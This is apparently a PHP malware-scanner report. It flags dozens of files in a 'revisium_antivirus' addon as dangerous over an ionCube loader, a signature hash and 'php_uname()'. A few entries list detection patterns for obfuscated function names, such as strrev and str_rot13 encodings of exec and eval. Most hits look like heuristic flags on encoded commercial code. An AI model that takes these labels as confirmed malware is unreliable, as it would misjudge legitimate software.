Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Errors.php Size: 1.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/FoldersInfoStorage.php Size: 2.73 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsReinfected.php Size: 6.02 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsReturnCode.php Size: 5.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/BlacklistedDetails.php Size: 4.66 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsAccumulated.php Size: 5.67 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/FilesMetaInfoStorage.php Size: 2.40 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/Stats.php Size: 2.11 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Model/StatsFullCured.php Size: 4.82 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/TaskManager.php Size: 8.63 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/ScanTaskParams.php Size: 6.28 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/ScanTask.php Size: 10.08 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/Task.php Size: 6.90 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function strrev exec_strrev Line: 60 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
CExE
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/UndoTask.php Size: 10.24 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/UndoTaskParams.php Size: 3.27 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/TaskParams.php Size: 5.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/CureTask.php Size: 12.89 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Task/CureTaskParams.php Size: 3.74 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 eval_str_rot13 Line: 30 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
rinY
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Cli.php Size: 10.02 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/AntivirusTaskHelper.php Size: 7.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/GSB.php Size: 4.01 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/BlacklistedAbstract.php Size: 7.34 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Openphish.php Size: 2.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Spamhaus.php Size: 3.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/BlacklistedCache.php Size: 3.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/YSB.php Size: 2.83 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/Phishtank.php Size: 3.88 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Blacklisted/RequestManager.php Size: 13.20 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FolderInfo.php Size: 28.01 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Accumulated.php Size: 12.07 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/ReturnCode.php Size: 4.49 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/StatsAbstract.php Size: 2.71 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Reinfected.php Size: 5.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Stats/Sender.php Size: 6.55 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/BackupHelper.php Size: 4.68 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Restore.php Size: 3.41 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Cure.php Size: 10.22 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Antivirus.php Size: 9.03 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/CureReport.php Size: 7.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Backup.php Size: 3.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Report.php Size: 2.60 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Mover.php Size: 7.87 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/Scan.php Size: 12.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Antivirus/ScanReport.php Size: 7.84 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Tools.php Size: 9.00 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function str_rot13 exec_str_rot13 Line: 102 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
rKRp
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/autoload.php Size: 2.77 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/TaskManager.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/KeyListStorage.php Size: 20.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/EmailSMTP.php Size: 12.03 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/Email.php Size: 3.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Email/EmailPHPMail.php Size: 2.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Queue.php Size: 9.17 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/System.php Size: 6.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Helper.php Size: 3.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/ProfilingXHprof.php Size: 4.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Task.php Size: 14.10 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/FileHelper.php Size: 11.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Cleaner.php Size: 7.38 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/TaskParams.php Size: 3.44 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/rv_framework/lib/Locker.php Size: 5.27 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
